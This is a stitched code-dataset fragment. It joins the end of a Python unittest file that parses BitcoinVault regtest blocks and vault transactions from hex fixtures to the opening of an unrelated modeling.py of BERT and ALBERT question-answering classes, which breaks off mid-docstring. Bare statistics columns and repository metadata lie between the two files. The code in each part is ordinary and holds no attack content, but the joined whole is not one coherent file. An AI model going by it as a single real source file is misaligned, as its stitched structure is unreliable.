AR_RECOVERY_SEGWIT = '02000000000101ca61e1d9e95eec6c933bbfa80b43949044eade2fa0b032bd09de3c793b4db1f400000000232200205bbc7969b9505c29f636f3cdc9f6e8d89926d06114d5ae94ff1710365250c250ffffffff01d4be14130400000017a9142cc746419d3d43a7fc207bafd01330ad649da3bc8705004730440220606ca8135c04d490ad31559b4c247308fa0f4679ec844c13a75e8a5a2ea6cba902204372eabd0b838c881e7a4cad78dde4d1ac8da78e36a5a4c67cec9b5bf49bb56b01473044022077a667e62e1287703fd3998c8016cad17e1211bdd7d2f68d15144ce7b169b81e0220481a27598e45e5c4ba764baa958d534d9b03751442f9e187e102869092e76ece01004b635167526821025813111f13514b978271140162e20239148009a73f4a84ade8f5dff3e3f64ad42102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c52ae00000000'
AR_ALERT_NON_SEGWIT = '0200000001f0461fae7c01202cb1acf5240f27c19042c2b6d7b84a43e289d042527c2ed77400000000960047304402202730a847a3f8a2e7f08af57aea3724c29e9188df8143f8c2822c94c896c5281b022004db4d4302bb0ce550fed358cb201c4331fc061fe9e6d32351e1aa82ecf6201801514b635167526821031bd9624f553f98f6c07aba97a98f113abc48b4dc22910ac1d77e7bb6fbdc7f202102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c52aeffffffff01c08c05130400000017a914340d407d281db4948d160ce867be856e33e67f2f8700000000'
AR_RECOVERY_NON_SEGWIT = '0200000001663d528f7d8fc77052982f1450449f0f87e4166260ec6841d6a95d193e678cb700000000de004730440220488e944a6c50dfe30ba31fb628f9c2d4267464834ef74736d85e27abaa95c355022037691bdd0a7062d6fea1fc5f2031191eaa2ab58dd60a1cbfe75e07bb1a49b66f0147304402207c700c0168b660040cad56ad22c0edfd22c974ec2724a8706ca5b828986c29b502202a046f8fe06263ebaf0842233dd1b7efe5268133740d896b28aed70629c45dc101004b63516752682103cd251bbdc8be370b509cc23bf750e5c737a481935f6f0034d06e56aa8dfed5a82102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c52aeffffffff01acb414130400000017a914595cce2b8db57f3a046f766df71e082612ea6c348700000000'
AIR_ALERT_SEGWIT = '02000000000101d9864ecdbf38f1d4cbcf08bdadbe061fb529e2fa78d9706405a27f7f99cc4204000000002322002022a869aea58eaec22f77693e5ab603880901384699d8d5ea993605759b197678feffffff02b8f279d70300000017a914d0cf533a5781e2c36ec178ecf4ce33dec1c3d0808700ca9a3b0000000017a914a157d16bc66cf6cd7e5d3daaedb7a2379c54dd3a87040047304402205b224a687f72046fdc58e1e6662700163fe53ae3bb7fef3466c769e2cb93f0c00220744bc1ca8ddbc7106c0ef6cdf9b63d93295b0042892d4c0fc2c7a1801b7ffcf2010101716351676352675368682103a03684a36e33e20e4e11619eb89c379f5d48621dc23428893f7ba373b319ffe3210263451a52f3d3ae6918969e1c5ce934743185578481ef8130336ad1726ba61ddb2102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c53aec8000000'
AIR_INSTANT_SEGWIT = '02000000000101c04516f5d32d25741f766fc64fe022413edb8f65fd88ab6f3e50c3c2e6dd73e100000000232200202272d90e83d5973cf09f83b81eeb4a59e5a77e01a7de87f311c21b3c62359d22ffffffff01c08c05130400000017a91455e78174653079683f2f3d064c469177506e670e870600473044022035036d46c4ef714c864089ce4233f14ff8a08c9d9e0716ff89a34f11cd19f2f502201a3d3d359633d8893acbedde9be2000529dbc9246ed3ab3bc00f8043867396ea0147304402202eab1285c1e76cd98e7a6fc200133e72c5eed88d4345003b45745530180bd435022028e42caa13d08c820ada0e9b23c3acde440aaa11738d7eba954f2c3414e684a301010100716351676352675368682103670b6c9b4f7c7d86bf1ec6621b30aeed9b90fb323323f78e688dc442e5eed33d210263451a52f3d3ae6918969e1c5ce934743185578481ef8130336ad1726ba61ddb2102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c53ae00000000'
AIR_RECOVERY_SEGWIT = '02000000000101d8fbcabcee7962dc3827b18f7059c446a30a9711f40b89ee17f7bb1d91cd8fe20000000023220020243ad3ec325e433f4d18154df124b67ceb6425033e9dab515d5f66245bed5b24ffffffff01b8bc14130400000017a91493be10a6ea9fa8f7a04638e82fa77980a1a1656887070047304402206b83dd23e3bc90c0f3eed38618ae08218272585c5593cec403fc40bc7df060d8022079fdfee0297c5f67690b992ddeba49e978ddc999474be9f229eb9865fb03c1f00147304402202c1548716fcc3b18209763f858903b18daa0c765b8460f8c3a5b8596e7d5505b022003181f6eab71fb55e3d4e9c7ad12ae44749f50bc259953f421d7f419413c1d3b014730440220269e848d0d095c3324f5a0c785b06044a0839ae2cf963d63a1a8b09a7eb3093402205f176fbab7f579d6f34a29e0062eb74fcbf18221f4583da615fcd620106bdec101000071635167635267536868210249267ea5dffd2352705fa4c12105227fcd045d2ecefb07f009d96ca870cb5511210263451a52f3d3ae6918969e1c5ce934743185578481ef8130336ad1726ba61ddb2102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c53ae00000000'
AIR_ALERT_NON_SEGWIT = '0200000001528a5bd018582633521f45bde42c350fc36864eb328b192ca4fa954ac0d5cc7600000000bd0047304402206202bbe65e9495786a170c337c878d1e75609ed43d1684e8f5d2862f81b6f25c02206567951bc4b1e43a014b58366021a7f542a81049c73fbcfc0c2fff782406f96a01514c71635167635267536868210282163aaebde9f9e06913a1781035f4f0ea76bc4b10df86ec212e3dce04e980d9210263451a52f3d3ae6918969e1c5ce934743185578481ef8130336ad1726ba61ddb2102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c53aeffffffff01c08c05130400000017a91452c92b0c21d03b5d81b313b8742e40083ab57b958700000000'
AIR_INSTANT_NON_SEGWIT = '020000000188a12cd284149b0f9717887c49c6383ad396b1238bdf51e4ce23e383a55f96f200000000fd0601004730440220097967259a57dadb560f99bc2cc1737c4b4f0bc4b22d83f0f4b9735c66ea8bf2022027063e3fa15cc28aa31733418a5861b27e2f48f7a53dac2abce966e309cddd4b0147304402205db152157bf3976af2994b4845b532e95beeaa3066dc0b3365ba7e502a233d8c0220151057974fcc794e038c2318ba91c0f97b8d03cb528c9e70d8e91eba686691b70151004c7163516763526753686821024520ea83b1056de89db38b8e29c8682d452612bba1b35b65921c50c4556c87bc210263451a52f3d3ae6918969e1c5ce934743185578481ef8130336ad1726ba61ddb2102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c53aefeffffff02c4e179d70300000017a91468056e54e5c43992171b66c62d772fd5f94811648700ca9a3b0000000017a914acbebff8b77719daf7e74332c73f4df0fde410b887c8000000'
AIR_RECOVERY_NON_SEGWIT = '020000000179f1b9964adbacdfcbeb22055b31cd2144f57977c9161d49c65818716c7201ca00000000fd4e0100473044022065487a2cc9b56ac84a29215be220ad9ecb57d603801205060b10b097fbe0031302203b805346e596c1c468734898c2fa41b49ab58b86d66ec9ab9c7a739470ce515c0147304402200b25123c0160e9bf687ea40141a8c5895ca18b7010239a7b42874f7e3dbcd14b02202090ac94c6944a6831bac23f5adcb10b2a7bd8cc23d89e7ebedfc0efce83a66e01473044022047b759cfff47025dbbb5bd3c565596e48a9da924b81df24d984661a7650d66d5022038fd4f752ea59e5dd0533a509868f996e7a49722dd5a397c6fa60202a879d9bd0100004c716351676352675368682103ac06ee8b5187a9ae8ae8cefd53db808073e7eb8a89f0f62cc2d957f711d78688210263451a52f3d3ae6918969e1c5ce934743185578481ef8130336ad1726ba61ddb2102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c53aeffffffff01c4ab14130400000017a914a36dd67e2baf6b9508d630ceddb4c7d61158c5b78700000000'
AUXPOW_BLOCKS = [
    '040166061d0f1d80ff8924f3f82f7bb86d52ae8c4244370ed52c1c4e211eb5f269adce0140efd0437a06d93af465ab89d6a15d7113712b92e137c30ba447d02cae272057dbe5494dffff7f200000000001000000010000000000000000000000000000000000000000000000000000000000000000ffffffff2cfabe6d6deb2fe7b538e53c01e30419bad36b138b660dd1e8e15fd73c3af4b6982ef104fb0100000000000000ffffffff00000000004e61bc00000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000007f505aa144b1edfa154b08a88f105fd2c01b500f4541700db87c4e873d73fbf0000000000000000000000010101000000010000000000000000000000000000000000000000000000000000000000000000ffffffff020101ffffffff0100cf14130400000001510000000000',
    '040166061d0f1d80ff8924f3f82f7bb86d52ae8c4244370ed52c1c4e211eb5f269adce010686fc5149c35a29379502a7d52d98dfcf9a017571eda9c086c678c9dc7f505871e5765fffff7f200000000002000000010000000000000000000000000000000000000000000000000000000000000000ffffffff2928a491c9904cb0afe055a049fd22388968a5d22953a3eb7936ca12a9ac55542a7b0100000000000000ffffffff00000000004e61bc000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000a03da1fdcdda7c24b1390f21af9b7b0ea280247dc84f2a43a936c91b3be9ebf600000000000000000000000001020000000001010000000000000000000000000000000000000000000000000000000000000000ffffffff24512000000000000000000000000000000000000000000000000000000000000000000101ffffffff0200cf14130400000017a914c3cba25c0889229a789fe07f96c634ae4f896eaa870000000000000000266a24aa21a9ede2f61c3f71d1defd3fa999dfa36953755c690689799962b48bebd836974e8cf9012000000000000000000000000000000000000000000000000000000000000000000000000000',
    '04016606c4395907d518d285f085ae78517019b387e5fd98616cada4c830f4bd4cf7255b14d9a411df7581d16b413ecab17d40464465df66cb4e0f1bc1ee48dd8c9be78e77e5765fffff7f200200000002000000010000000000000000000000000000000000000000000000000000000000000000ffffffff2928f9aa52fda07ca95e6cb4ecf6520ffaef1b224f28882269f1ff03153d15ad482c0100000000000000ffffffff00000000004e61bc000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000b2143e4a624ad5a2cd2eda98e0efe51a9b9e29d6c0c8dc6c65ad351c28c9af3700000000000000000000000001020000000001010000000000000000000000000000000000000000000000000000000000000000ffffffff24522000000000000000000000000000000000000000000000000000000000000000000101ffffffff0200cf14130400000017a9144988a9b2ab78cc2832c6c0fb3523538f30714dfe870000000000000000266a24aa21a9ede2f61c3f71d1defd3fa999dfa36953755c690689799962b48bebd836974e8cf9012000000000000000000000000000000000000000000000000000000000000000000000000000',
    '040166061d0f1d80ff8924f3f82f7bb86d52ae8c4244370ed52c1c4e211eb5f269adce0140efd0437a06d93af465ab89d6a15d7113712b92e137c30ba447d02cae272057dbe5494dffff7f200000000001000000010000000000000000000000000000000000000000000000000000000000000000ffffffff2cfabe6d6deb2fe7b538e53c01e30419bad36b138b660dd1e8e15fd73c3af4b6982ef104fb0100000000000000ffffffff00000000004e61bc00000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000007f505aa144b1edfa154b08a88f105fd2c01b500f4541700db87c4e873d73fbf0000000000000000000000010101000000010000000000000000000000000000000000000000000000000000000000000000ffffffff020101ffffffff0100cf14130400000001510000000000',
]


class TestParsingAuxPowBlock(TestCase):
    def setUp(self):
        self.coin = BitcoinVaultRegTest()

    def test_deserialize(self):
        for aux_block in AUXPOW_BLOCKS:
            raw_block = bytes.fromhex(aux_block)
            block = self.coin.block(raw_block, 1)
            transactions = block.transactions
            self.assertEqual(len(transactions), 1)


class TestParsingAlertTransaction(TestCase):
    def setUp(self):
        self.coin = BitcoinVaultRegTest()

    def test_no_segwit_atx(self):
        raw_block = bytes.fromhex(
            HEADER + '01' + TX_SEGWIT + '01' + AR_ALERT_NON_SEGWIT
        )
        block = self.coin.block(raw_block, 344)
        transactions = block.transactions
        alerts = block.alerts
        self.assertEqual(len(transactions), 1)
        self.assertEqual(len(alerts), 1)
        self.assertIsInstance(alerts[0][0], TxVault)
        self.assertEqual(alerts[0][0].type, VaultTxType.ALERT_PENDING)

    def test_segwit_atx(self):
        raw_block = bytes.fromhex(
            HEADER + '01' + TX_SEGWIT + '01' + AR_ALERT_SEGWIT
        )
        block = self.coin.block(raw_block, 344)
        transactions = block.transactions
        alerts = block.alerts
        self.assertEqual(len(transactions), 1)
        self.assertEqual(len(alerts), 1)
        self.assertIsInstance(alerts[0][0], TxVaultSegWit)
        self.assertEqual(alerts[0][0].type, VaultTxType.ALERT_PENDING)

    def test_no_atx(self):
        raw_block = bytes.fromhex(
            HEADER + '01' + TX_SEGWIT
        )
        block = self.coin.block(raw_block, 344)
        transactions = block.transactions
        alerts = block.alerts
        self.assertEqual(len(transactions), 1)
        self.assertEqual(len(alerts), 0)
        self.assertIsInstance(transactions[0][0], TxVaultSegWit)

    def test_no_segwit_atx_alerts_disabled(self):
        raw_block = bytes.fromhex(
            HEADER + '01' + AR_ALERT_NON_SEGWIT + '01' + AR_ALERT_NON_SEGWIT
        )
        _coin = BitcoinVault()
        block = _coin.block(raw_block, 344)
        transactions = block.transactions
        alerts = block.alerts
        self.assertEqual(len(transactions), 1)
        self.assertIsInstance(transactions[0][0], TxVault)
        self.assertEqual(transactions[0][0].type, VaultTxType.NONVAULT)
        self.assertEqual(len(alerts), 0)

    def test_segwit_atx_alerts_disabled(self):
        raw_block = bytes.fromhex(
            HEADER + '01' + AR_ALERT_SEGWIT + '01' + AR_ALERT_SEGWIT
        )
        _coin = BitcoinVault()
        block = _coin.block(raw_block, 344)
        transactions = block.transactions
        alerts = block.alerts
        self.assertEqual(len(transactions), 1)
        self.assertIsInstance(transactions[0][0], TxVaultSegWit)
        self.assertEqual(transactions[0][0].type, VaultTxType.NONVAULT)
        self.assertEqual(len(alerts), 0)


class TestVaultTxTypeDiscovery(TestCase):
    def setUp(self):
        self.coin = BitcoinVaultRegTest()

    def test_discover_ar_alert(self):
        raw_block = bytes.fromhex(
            HEADER + '01' + AR_ALERT_SEGWIT + '01' + AR_ALERT_SEGWIT
        )
        block = self.coin.block(raw_block, 344)
        transactions = block.transactions
        alerts = block.alerts
        self.assertEqual(len(transactions), 1)
        self.assertIsInstance(transactions[0][0], TxVaultSegWit)
        self.assertEqual(transactions[0][0].type, VaultTxType.ALERT_CONFIRMED)
        self.assertEqual(len(alerts), 1)
        self.assertIsInstance(alerts[0][0], TxVaultSegWit)
        self.assertEqual(alerts[0][0].type, VaultTxType.ALERT_PENDING)

    def test_discover_ar_alert_nonsegwit(self):
        raw_block = bytes.fromhex(
            HEADER + '01' + TX_SEGWIT + '01' + AR_ALERT_NON_SEGWIT
        )
        block = self.coin.block(raw_block, 344)
        alerts = block.alerts
        self.assertEqual(len(alerts), 1)
        self.assertIsInstance(alerts[0][0], TxVault)
        self.assertEqual(alerts[0][0].type, VaultTxType.ALERT_PENDING)

    def test_discover_ar_recovery(self):
        raw_block = bytes.fromhex(
            HEADER + '02' + TX_SEGWIT + AR_RECOVERY_SEGWIT
        )
        block = self.coin.block(raw_block, 344)
        transactions = block.transactions
        alerts = block.alerts
        self.assertEqual(len(transactions), 2)
        self.assertEqual(len(alerts), 0)
        self.assertIsInstance(transactions[1][0], TxVaultSegWit)
        self.assertEqual(transactions[1][0].type, VaultTxType.RECOVERY)

    def test_discover_ar_recovery_nonsegwit(self):
        raw_block = bytes.fromhex(
            HEADER + '02' + TX_SEGWIT + AR_RECOVERY_NON_SEGWIT
        )
        block = self.coin.block(raw_block, 344)
        transactions = block.transactions
        alerts = block.alerts
        self.assertEqual(len(transactions), 2)
        self.assertEqual(len(alerts), 0)
        self.assertIsInstance(transactions[1][0], TxVault)
        self.assertEqual(transactions[1][0].type, VaultTxType.RECOVERY)

    def test_discover_air_alert(self):
        raw_block = bytes.fromhex(
            HEADER + '01' + AIR_ALERT_SEGWIT + '01' + AIR_ALERT_SEGWIT
        )
        block = self.coin.block(raw_block, 344)
        transactions = block.transactions
        alerts = block.alerts
        self.assertEqual(len(transactions), 1)
        self.assertIsInstance(transactions[0][0], TxVaultSegWit)
        self.assertEqual(transactions[0][0].type, VaultTxType.ALERT_CONFIRMED)
        self.assertEqual(len(alerts), 1)
        self.assertIsInstance(alerts[0][0], TxVaultSegWit)
        self.assertEqual(alerts[0][0].type, VaultTxType.ALERT_PENDING)

    def test_discover_air_alert_nonsegwit(self):
        raw_block = bytes.fromhex(
            HEADER + '01' + TX_SEGWIT + '01' + AIR_ALERT_NON_SEGWIT
        )
        block = self.coin.block(raw_block, 344)
        alerts = block.alerts
        self.assertEqual(len(alerts), 1)
        self.assertIsInstance(alerts[0][0], TxVault)
        self.assertEqual(alerts[0][0].type, VaultTxType.ALERT_PENDING)

    def test_discover_air_instant(self):
        raw_block = bytes.fromhex(
            HEADER + '02' + TX_SEGWIT + AIR_INSTANT_SEGWIT + '00'
        )
        block = self.coin.block(raw_block, 344)
        transactions = block.transactions
        alerts = block.alerts
        self.assertEqual(len(transactions), 2)
        self.assertEqual(len(alerts), 0)
        self.assertIsInstance(transactions[1][0], TxVaultSegWit)
        self.assertEqual(transactions[1][0].type, VaultTxType.INSTANT)

    def test_discover_air_instant_nonsegwit(self):
        raw_block = bytes.fromhex(
            HEADER + '02' + TX_SEGWIT + AIR_INSTANT_NON_SEGWIT + '00'
        )
        block = self.coin.block(raw_block, 344)
        transactions = block.transactions
        alerts = block.alerts
        self.assertEqual(len(transactions), 2)
        self.assertEqual(len(alerts), 0)
        self.assertIsInstance(transactions[1][0], TxVault)
        self.assertEqual(transactions[1][0].type, VaultTxType.INSTANT)

    def test_discover_air_recovery(self):
        raw_block = bytes.fromhex(
            HEADER + '02' + TX_SEGWIT + AIR_RECOVERY_SEGWIT + '00'
        )
        block = self.coin.block(raw_block, 344)
        transactions = block.transactions
        alerts = block.alerts
        self.assertEqual(len(transactions), 2)
        self.assertEqual(len(alerts), 0)
        self.assertIsInstance(transactions[1][0], TxVaultSegWit)
        self.assertEqual(transactions[1][0].type, VaultTxType.RECOVERY)

    def test_discover_air_recovery_nonsegwit(self):
        raw_block = bytes.fromhex(
            HEADER + '02' + TX_SEGWIT + AIR_RECOVERY_NON_SEGWIT + '00'
        )
        block = self.coin.block(raw_block, 344)
        transactions = block.transactions
        alerts = block.alerts
        self.assertEqual(len(transactions), 2)
        self.assertEqual(len(alerts), 0)
        self.assertIsInstance(transactions[1][0], TxVault)
        self.assertEqual(transactions[1][0].type, VaultTxType.RECOVERY)

    def test_discover_ar_alert_alerts_disabled(self):
        raw_block = bytes.fromhex(
            HEADER + '01' + AR_ALERT_SEGWIT + '01' + AR_ALERT_SEGWIT
        )
        _coin = BitcoinVault()
        block = _coin.block(raw_block, 344)
        transactions = block.transactions
        alerts = block.alerts
        self.assertEqual(len(transactions), 1)
        self.assertIsInstance(transactions[0][0], TxVaultSegWit)
        self.assertEqual(transactions[0][0].type, VaultTxType.NONVAULT)
        self.assertEqual(len(alerts), 0)
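The fixtures above are combined by plain hex concatenation: a regtest block is the 80-byte header, a one-byte varint transaction count, the transactions, and optionally a second varint-counted list of alert transactions. A minimal sketch of that assembly, assuming only the constants above (build_block is a hypothetical helper, not part of the test suite):

def build_block(header_hex, txs, alerts=None):
    # Every count in these fixtures is below 0xfd, so one byte is a valid varint.
    parts = [header_hex, '%02x' % len(txs)] + list(txs)
    if alerts is not None:
        parts += ['%02x' % len(alerts)] + list(alerts)
    return bytes.fromhex(''.join(parts))

# Equivalent to the raw_block assembled inline in test_segwit_atx:
raw_block = build_block(HEADER, [TX_SEGWIT], [AR_ALERT_SEGWIT])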
66.828947
1,003
0.824719
1,043
20,316
15.878236
0.072867
0.043476
0.033694
0.02053
0.313991
0.3091
0.305537
0.305537
0.301008
0.291226
0
0.45411
0.126354
20,316
303
1,004
67.049505
0.478957
0
0
0.711934
0
0
0.535046
0.532191
0
1
0
0
0.271605
1
0.082305
false
0
0.012346
0
0.106996
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
1
0
1
0
0
1
0
0
0
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
7
f1da58a9d853f20c13cf4aabd1ce9d9f9033cf4b
57,573
py
Python
modeling.py
somiltg/orconvqa-release
61dac37ee018a55bebef5bda9c3588937e010254
[ "MIT" ]
null
null
null
modeling.py
somiltg/orconvqa-release
61dac37ee018a55bebef5bda9c3588937e010254
[ "MIT" ]
null
null
null
modeling.py
somiltg/orconvqa-release
61dac37ee018a55bebef5bda9c3588937e010254
[ "MIT" ]
1
2021-04-02T07:06:10.000Z
2021-04-02T07:06:10.000Z
import os import logging import collections import torch from transformers import BertModel, BertPreTrainedModel, AlbertModel from transformers.modeling_bert import (BertEncoder, BertOutput, BertAttention, BertIntermediate, BertLayer, BertEmbeddings, BertPooler, BertLayerNorm) from transformers.modeling_albert import AlbertPreTrainedModel from torch import nn from torch.nn import CrossEntropyLoss import torch.nn.functional as F from copy import deepcopy from transformers.configuration_utils import PretrainedConfig from transformers.file_utils import (TF2_WEIGHTS_NAME, TF_WEIGHTS_NAME, WEIGHTS_NAME, cached_path) logger = logging.getLogger(__name__) class BertForOrconvqa(BertPreTrainedModel): r""" **start_positions**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size,)``: Labels for position (index) of the start of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. **end_positions**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size,)``: Labels for position (index) of the end of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. **retrieval_label**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size,)``: Whether the retrieved evidence is the true evidence. For computing the sentece classification loss. Outputs: `Tuple` comprising various elements depending on the configuration (config) and inputs: **loss**: (`optional`, returned when ``labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``: Total span extraction loss is the sum of a Cross-Entropy for the start and end positions. **start_scores**: ``torch.FloatTensor`` of shape ``(batch_size, sequence_length,)`` Span-start scores (before SoftMax). **end_scores**: ``torch.FloatTensor`` of shape ``(batch_size, sequence_length,)`` Span-end scores (before SoftMax). **hidden_states**: (`optional`, returned when ``config.output_hidden_states=True``) list of ``torch.FloatTensor`` (one for the output of each layer + the output of the embeddings) of shape ``(batch_size, sequence_length, hidden_size)``: Hidden-states of the model at the output of each layer plus the initial embedding outputs. **attentions**: (`optional`, returned when ``config.output_attentions=True``) list of ``torch.FloatTensor`` (one for each layer) of shape ``(batch_size, num_heads, sequence_length, sequence_length)``: Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads. 
""" def __init__(self, config): super(BertForOrconvqa, self).__init__(config) self.num_qa_labels = config.num_qa_labels self.num_retrieval_labels = config.num_retrieval_labels self.bert = BertModel(config) self.qa_outputs = nn.Linear(config.hidden_size, config.num_qa_labels) self.dropout = nn.Dropout(config.hidden_dropout_prob) self.classifier = nn.Linear(config.hidden_size, config.num_retrieval_labels) self.qa_loss_factor = config.qa_loss_factor self.retrieval_loss_factor = config.retrieval_loss_factor self.init_weights() def forward(self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, start_positions=None, end_positions=None, retrieval_label=None): outputs = self.bert(input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds) sequence_output = outputs[0] pooled_output = outputs[1] qa_logits = self.qa_outputs(sequence_output) start_logits, end_logits = qa_logits.split(1, dim=-1) start_logits = start_logits.squeeze(-1) end_logits = end_logits.squeeze(-1) pooled_output = self.dropout(pooled_output) retrieval_logits = self.classifier(pooled_output) outputs = (start_logits, end_logits, retrieval_logits) + outputs[2:] if start_positions is not None and end_positions is not None and retrieval_label is not None: # If we are on multi-GPU, split add a dimension if len(start_positions.size()) > 1: start_positions = start_positions.squeeze(-1) if len(end_positions.size()) > 1: end_positions = end_positions.squeeze(-1) # sometimes the start/end positions are outside our model inputs, we ignore these terms ignored_index = start_logits.size(1) start_positions.clamp_(0, ignored_index) end_positions.clamp_(0, ignored_index) qa_loss_fct = CrossEntropyLoss(ignore_index=ignored_index) start_loss = qa_loss_fct(start_logits, start_positions) end_loss = qa_loss_fct(end_logits, end_positions) qa_loss = (start_loss + end_loss) / 2 retrieval_loss_fct = CrossEntropyLoss() retrieval_loss = retrieval_loss_fct(retrieval_logits.view(-1, self.num_retrieval_labels), retrieval_label.view(-1)) total_loss = self.qa_loss_factor * qa_loss + self.retrieval_loss_factor * retrieval_loss outputs = (total_loss, qa_loss, retrieval_loss,) + outputs return outputs # (loss), start_logits, end_logits, (hidden_states), (attentions) class BertForOrconvqaGlobal(BertPreTrainedModel): r""" **start_positions**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, num_blocks,)``: Labels for position (index) of the start of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. **end_positions**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, num_blocks,)``: Labels for position (index) of the end of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. **retrieval_label**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, num_blocks,)``: Whether the retrieved evidence is the true evidence. For computing the sentece classification loss. 
Outputs: `Tuple` comprising various elements depending on the configuration (config) and inputs: **loss**: (`optional`, returned when ``labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``: Total span extraction loss is the sum of a Cross-Entropy for the start and end positions. **start_scores**: ``torch.FloatTensor`` of shape ``(batch_size, sequence_length,)`` Span-start scores (before SoftMax). **end_scores**: ``torch.FloatTensor`` of shape ``(batch_size, sequence_length,)`` Span-end scores (before SoftMax). **hidden_states**: (`optional`, returned when ``config.output_hidden_states=True``) list of ``torch.FloatTensor`` (one for the output of each layer + the output of the embeddings) of shape ``(batch_size, sequence_length, hidden_size)``: Hidden-states of the model at the output of each layer plus the initial embedding outputs. **attentions**: (`optional`, returned when ``config.output_attentions=True``) list of ``torch.FloatTensor`` (one for each layer) of shape ``(batch_size, num_heads, sequence_length, sequence_length)``: Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads. """ def __init__(self, config): super(BertForOrconvqaGlobal, self).__init__(config) self.num_qa_labels = config.num_qa_labels self.bert = BertModel(config) self.qa_outputs = nn.Linear(config.hidden_size, config.num_qa_labels) self.dropout = nn.Dropout(config.hidden_dropout_prob) self.classifier = nn.Linear(config.hidden_size, 1) self.qa_loss_factor = config.qa_loss_factor self.retrieval_loss_factor = config.retrieval_loss_factor self.init_weights() def forward(self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, start_positions=None, end_positions=None, retrieval_label=None): batch_size, num_blocks, seq_len = input_ids.size() input_ids = input_ids.view(-1, seq_len) attention_mask = attention_mask.view(-1, seq_len) token_type_ids = token_type_ids.view(-1, seq_len) outputs = self.bert(input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds) sequence_output = outputs[0] pooled_output = outputs[1] qa_logits = self.qa_outputs(sequence_output) start_logits, end_logits = qa_logits.split(1, dim=-1) start_logits = start_logits.squeeze(-1) # (batch_size * num_blocks, seq_len) # print('start_logits', start_logits.size()) end_logits = end_logits.squeeze(-1) pooled_output = self.dropout(pooled_output) retrieval_logits = self.classifier(pooled_output) # (batch_size * num_blocks, 1) # print('retrieval_logits', retrieval_logits.size()) outputs = (start_logits, end_logits, retrieval_logits) + outputs[2:] if start_positions is not None and end_positions is not None and retrieval_label is not None: start_logits = start_logits.view(batch_size, -1) end_logits = end_logits.view(batch_size, -1) retrival_logits = retrieval_logits.squeeze(-1) retrieval_logits = retrieval_logits.view(batch_size, -1) start_positions = start_positions.squeeze(-1).max(dim=1).values end_positions = end_positions.squeeze(-1).max(dim=1).values retrieval_label = retrieval_label.squeeze(-1).argmax(dim=1) # If we are on multi-GPU, split add a dimension if len(start_positions.size()) > 1: start_positions = start_positions.squeeze(-1) if len(end_positions.size()) > 1: end_positions = end_positions.squeeze(-1) # sometimes the start/end positions are outside our model inputs, we ignore these terms ignored_index = start_logits.size(1) 
start_positions.clamp_(0, ignored_index) end_positions.clamp_(0, ignored_index) qa_loss_fct = CrossEntropyLoss(ignore_index=ignored_index) start_loss = qa_loss_fct(start_logits, start_positions) end_loss = qa_loss_fct(end_logits, end_positions) qa_loss = (start_loss + end_loss) / 2 retrieval_loss_fct = CrossEntropyLoss() retrieval_loss = retrieval_loss_fct(retrieval_logits, retrieval_label) total_loss = self.qa_loss_factor * qa_loss + self.retrieval_loss_factor * retrieval_loss outputs = (total_loss, qa_loss, retrieval_loss,) + outputs return outputs # (loss), start_logits, end_logits, (hidden_states), (attentions) class AlbertForOrconvqaGlobal(AlbertPreTrainedModel): r""" **start_positions**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, num_blocks,)``: Labels for position (index) of the start of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. **end_positions**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, num_blocks,)``: Labels for position (index) of the end of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. **retrieval_label**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, num_blocks,)``: Whether the retrieved evidence is the true evidence. For computing the sentece classification loss. Outputs: `Tuple` comprising various elements depending on the configuration (config) and inputs: **loss**: (`optional`, returned when ``labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``: Total span extraction loss is the sum of a Cross-Entropy for the start and end positions. **start_scores**: ``torch.FloatTensor`` of shape ``(batch_size, sequence_length,)`` Span-start 